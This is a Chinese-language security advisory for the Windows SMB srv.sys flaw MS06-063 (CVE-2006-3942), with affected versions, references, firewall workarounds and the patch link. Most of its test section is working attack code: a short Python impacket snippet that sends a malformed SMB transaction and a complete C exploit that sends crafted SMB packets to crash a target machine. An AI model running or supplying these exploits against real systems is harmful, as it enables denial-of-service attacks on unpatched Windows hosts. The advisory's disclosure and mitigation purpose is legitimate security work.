安全研究
安全漏洞
Microsoft Windows SMB畸形管道请求处理远程拒绝服务漏洞(MS06-063)
发布日期:2006-07-28
更新日期:2006-10-11
受影响系统:
Microsoft Windows XP SP2描述:
Microsoft Windows XP SP1
Microsoft Windows XP
Microsoft Windows Server 2003 SP1
Microsoft Windows Server 2003
Microsoft Windows 2000SP4
BUGTRAQ ID: 19215
CVE(CAN) ID: CVE-2006-3942
Microsoft Windows是微软发布的非常流行的操作系统。
Windows的Server驱动(srv.sys)在处理某些SMB数据时存在空指针引用错误,远程攻击者可能利用此漏洞导致Windows系统崩溃死机。
如果远程攻击者向有漏洞的系统发送了包含有非正常终止的SMB_COM_TRANSACTION SMB消息(0x25)的话,就可能导致蓝屏死机。目前已有公开的攻击代码。
<*来源:Tom Cross
David Means
Scott Warfield
Nsfocus安全小组 (security@nsfocus.com)
链接:http://secunia.com/advisories/21276/print/
http://xforce.iss.net/xforce/alerts/id/231
http://xforce.iss.net/xforce/xfdb/27999
http://blogs.technet.com/msrc/archive/2006/07/28/443837.aspx
http://marc.theaimsgroup.com/?l=bugtraq&m=115568162330128&w=2
http://www.microsoft.com/technet/security/Bulletin/MS06-063.mspx
http://www.us-cert.gov/cas/techalerts/TA06-283A.html
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
s = smb.SMB('*SMBSERVER','10.0.1.44')
s.login('','')
tid = s.tree_connect_andx(r'\\*SMBSERVER\IPC$')
s.send_trans(tid, '\x01\x00\x00\x00\x00\x00', 'cuchicuchi','','')
/*******************************************************************
Microsoft SRV.SYS Mailslot Ring0 Memory Corruption(MS06-035)
Linux based Exploit
CVE ID: CVE-2006-3942
Securityfocus BID: 19215 (http://www.securityfocus.com/bid/19215/discuss)
Microsoft: MS06-036
Author: K.K.Senthil Velan
Email: senthilvelan@gmail.com
Description: This code is modified inorder to exploit the MS06_035 vulnerability from a Linux
machine.
The entire C code and shellcode written by cocoruder(frankruder_at_hotmail.com). I have ported
this code
to linux based C code.
Full credit goes to cocoruder(frankruder_at_hotmail.com) and milw0rm.com
page:http://ruder.cdut.net
*******************************************************************/
#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
unsigned char SmbNegotiate[] =
"\x00\x00\x00\x2f\xff\x53\x4d\x42\x72\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x88\x05\x00\x00\x00\x00\x00\x0c\x00\x02\x4e\x54"
"\x20\x4c\x4d\x20\x30\x2e\x31\x32\x00";
unsigned char Session_Setup_AndX_Request[]=
"\x00\x00\x00\x48\xff\x53\x4d\x42\x73\x00"
"\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\xff\xff\x88\x05\x00\x00\x00\x00\x0d\xff\x00\x00\x00\xff"
"\xff\x02\x00\x88\x05\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x01\x00\x00\x00\x0b\x00\x00\x00\x6e\x74\x00\x70\x79\x73\x6d"
"\x62\x00";
unsigned char TreeConnect_AndX_Request[]=
"\x00\x00\x00\x58\xff\x53\x4d\x42\x75\x00"
"\x00\x00\x00\x18\x07\xc8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\xff\xfe\x00\x08\x00\x03\x04\xff\x00\x58\x00\x08"
"\x00\x01\x00\x2d\x00\x00\x5c\x00\x5c\x00\x31\x00\x37\x00\x32\x00"
"\x2e\x00\x32\x00\x32\x00\x2e\x00\x35\x00\x2e\x00\x34\x00\x36\x00"
"\x5c\x00\x49\x00\x50\x00\x43\x00\x24\x00\x00\x00\x3f\x3f\x3f\x3f"
"\x3f\x00";
unsigned char Trans_Request[]=
"\x00\x00\x00\x56\xff\x53\x4d\x42\x25\x00"
"\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x08\x88\x05\x00\x08\x00\x00\x11\x00\x00\x01\x00\x00"
"\x04\xe0\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x55"
"\x00\x01\x00\x55\x00\x03\x00\x01\x00\x00\x00\x00\x00\x11\x00\x5c"
"\x4d\x41\x49\x4c\x53\x4c\x4f\x54\x5c\x4c\x41\x4e\x4d\x41\x4e\x41";
unsigned char recvbuff[2048];
void neg ( int s )
{
char response[1024];
memset(response,0,sizeof(response));
send(s,(char *)SmbNegotiate, sizeof(SmbNegotiate)-1,0);
}
void main(int argc,char **argv)
{
printf("Microsoft SRV.SYS Mailslot Ring0 Memory Corruption(MS06-035) \n");
printf("Linux based Exploit \n\n");
printf("Author: K.K.Senthil Velan \n");
printf("Email: senthilvelan@gmail.com \n");
printf("Full credit goes to cocoruder(frankruder_at_hotmail.com) and milw0rm.com \n");
printf("page:http://ruder.cdut.net \n\n");
if(argc < 3)
{
printf("Insufficient arguments: \n");
printf("Syntax: MS06_035 < Target > < Port > \n");
exit(0);
}
struct sockaddr_in server;
int sock;
unsigned int ret;
unsigned int userid,treeid;
sock = socket(AF_INET,SOCK_STREAM,0);
if(sock<=0)
{
return;
}
server.sin_family = AF_INET;
server.sin_addr.s_addr = inet_addr(argv[1]);
server.sin_port = htons((unsigned int)atoi(argv[2]));
ret=connect(sock,(struct sockaddr *)&server,sizeof(server));
if (ret==-1)
{
printf("connect error!\n");
return;
}
char response[1024];
memset(response,0,sizeof(response));
send(sock,(char *)SmbNegotiate, sizeof(SmbNegotiate)-1,0);
recv(sock,(char *)recvbuff,sizeof(recvbuff),0);
ret=send(sock,(char *)Session_Setup_AndX_Request,sizeof(Session_Setup_AndX_Request)-1,0);
if (ret<=0)
{
printf("send Session_Setup_AndX_Request error!\n");
return;
}
recv(sock,(char *)recvbuff,sizeof(recvbuff),0);
userid=*(unsigned int *)(recvbuff+0x20); //get userid
memcpy(TreeConnect_AndX_Request+0x20,(char *)&userid,2); //update userid
ret=send(sock,(char *)TreeConnect_AndX_Request,sizeof(TreeConnect_AndX_Request)-1,0);
if (ret<=0)
{
printf("send TreeConnect_AndX_Request error!\n");
return;
}
recv(sock,(char *)recvbuff,sizeof(recvbuff),0);
treeid=*(unsigned int *)(recvbuff+0x1c); //get treeid
memcpy(Trans_Request+0x20,(char *)&userid,2); //update userid
memcpy(Trans_Request+0x1c,(char *)&treeid,2); //update treeid
ret=send(sock,(char *)Trans_Request,sizeof(Trans_Request)-1,0);
if (ret<=0)
{
printf("send Trans_Request error!\n");
return;
}
recv(sock,(char *)recvbuff,sizeof(recvbuff),0);
printf("Exploit Completed !!! \n");
exit(0);
}
建议:
临时解决方法:
* 在边界防火墙上阻断TCP端口139和445上的入站和出站通讯。
厂商补丁:
Microsoft
---------
Microsoft已经为此发布了一个安全公告(MS06-063)以及相应补丁:
MS06-063:Vulnerability in Server Service Could Allow Denial of Service and Remote Code Execution (923414)
链接:http://www.microsoft.com/technet/security/Bulletin/MS06-063.mspx
浏览次数:5152
严重程度:10(网友投票)
绿盟科技给您安全的保障